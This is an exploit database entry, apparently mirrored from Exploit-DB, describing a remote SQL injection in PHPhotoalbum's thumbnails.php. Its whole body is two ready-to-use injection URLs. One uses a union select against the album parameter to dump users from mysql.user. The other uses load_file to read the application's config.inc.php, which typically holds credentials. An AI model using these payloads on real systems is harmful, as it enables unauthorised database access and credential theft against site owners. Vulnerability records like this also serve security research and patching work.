exploit-db-mirror/platforms/php/webapps/10590.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

8 lines
300 B
Text
Executable file

# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--